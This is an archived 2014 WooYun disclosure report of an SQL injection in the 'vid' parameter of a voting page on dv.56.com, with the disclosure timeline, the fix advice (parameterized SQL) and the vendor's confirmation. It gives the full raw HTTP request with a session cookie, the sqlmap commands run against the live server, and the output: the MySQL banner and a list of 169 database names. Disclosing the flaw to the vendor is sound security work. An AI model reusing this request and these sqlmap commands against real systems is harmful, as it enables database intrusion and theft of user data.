乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-30: 细节已通知厂商并且等待厂商处理中 2014-09-30: 厂商已经确认,细节仅向厂商公开 2014-10-10: 细节向核心白帽子及相关领域专家公开 2014-10-20: 细节向普通白帽子公开 2014-10-30: 细节向实习白帽子公开 2014-11-14: 细节向公众公开
涉及169个数据库
未对用户输入正确执行危险字符清理
存在问题参数vidPOST /2012byz/index.php?action=Index&do=Vote HTTP/1.1Content-Length: 138Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://dv.56.comCookie: PHPSESSID=qsvtdablfq81pffs9bodoe1q71Host: dv.56.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*vid=*
python sqlmap.py -r /root/sqlmap/sql8 --dbms=mysql --level=2 --risk=2 --banner
back-end DBMS: MySQL >= 5.0.0banner: '5.5.23-log'
python sqlmap.py -r /root/sqlmap/sql8 --dbms=mysql --level=2 --risk=2 --dbsavailable databases [169]:[*] `#mysql50#cooperate_mr-top`[*] `2012byz`[*] `56pro`[*] `56sys`[*] active[*] alan[*] baba[*] backup[*] baobao_2013[*] biye2012[*] brand[*] broadcast[*] c2c[*] comment_lott[*] cooperate[*] cooperate_2008[*] cooperate_51tv[*] cooperate_anycall[*] cooperate_backkom[*] cooperate_bbsee[*] cooperate_beauty[*] cooperate_dance[*] cooperate_ddt[*] cooperate_dgch[*] cooperate_doufaxiuxianjian[*] cooperate_frxz2[*] cooperate_fun[*] cooperate_gamech[*] cooperate_gtj[*] cooperate_happy_castle[*] cooperate_hhsh[*] cooperate_hhzw[*] cooperate_icinemec[*] cooperate_jxfy[*] cooperate_jxqy[*] cooperate_kdjl[*] cooperate_lhzs[*] cooperate_mcsd[*] cooperate_mhsg[*] cooperate_mjtx[*] cooperate_mlxt[*] cooperate_muchang[*] cooperate_pkcar[*] cooperate_pkfzl[*] cooperate_pmjx[*] cooperate_puke[*] cooperate_rxsg[*] cooperate_rxxy[*] cooperate_sgfy[*] cooperate_sml[*] cooperate_smzt[*] cooperate_sxd[*] cooperate_sydh[*] cooperate_tdyx[*] cooperate_torch2008[*] cooperate_tvb[*] cooperate_tzr[*] cooperate_wlyx[*] cooperate_wulin[*] cooperate_wztx[*] cooperate_xj[*] cooperate_xyj[*] cooperate_xyzt[*] cooperate_yjdx[*] cooperate_yqcm[*] cooperate_zgch[*] cooperate_zsg[*] cooperate_zxl_test1[*] cooperate_zxl_test2[*] cooperate_zywy[*] cooperate_zzyx[*] coopv_ask_and_answer[*] coopv_hunantv[*] coopv_huodong[*] coopv_huodongutf8[*] coopv_mingxing[*] coopv_top[*] diaocha[*] dingcan[*] dreamlist[*] dvman1[*] eight_years[*] enjoyingworld[*] exam[*] fiesta[*] food2012[*] game[*] gif[*] gift_box_2013[*] glh2014[*] hd[*] hd_2012_motherday[*] hd_2012_oscar[*] hd_beachbaby_2011[*] hd_common[*] hd_ent_dv_2011[*] hd_ent_hongren_2011[*] hd_ent_hunle_2011[*] hd_gift[*] hd_jinlong_2012[*] hd_kehan_2011[*] hd_lili[*] hd_ndshipin[*] hd_renren56[*] hd_shuixing_test1[*] hd_szy_2011[*] homeintro[*] hsh_ypcm[*] huaxin[*] huodong[*] huodong2014_freestyle[*] huodong_56happy[*] huodong_chaoqing[*] huodong_huaer[*] huodong_kongjianneice_2012[*] huodong_piao[*] information_schema[*] intro_2010[*] jing[*] join_notes[*] ksong[*] kxll[*] lepuur[*] library[*] lili_test[*] male2008[*] mhuan163[*] miss[*] mmdianli[*] mmpk[*] mmtea[*] mmzhaomu[*] monitor[*] mxyh[*] mysql[*] new56[*] news_center_wb[*] niurenku_youstyle[*] offline2013[*] olympics_2012[*] pepsi[*] performance_schema[*] php_imgadmin[*] publish[*] rb[*] sgfy_lucky[*] share[*] shengda[*] sp_sp61[*] special[*] special_thx[*] spstat[*] tianyi[*] town[*] travel[*] tslxx[*] url_complain[*] videoPrize[*] viki[*] voiceonline[*] vote[*] vote2010[*] world_cup_2010[*] youmo[*] yurenjie[*] zhaocha[*] zhongqiuzhufu[*] zht_new[*] zlottery
数据太多,请自查!
参数化SQL语句
危害等级:中
漏洞Rank:5
确认时间:2014-09-30 15:01
2014-09-30:fixed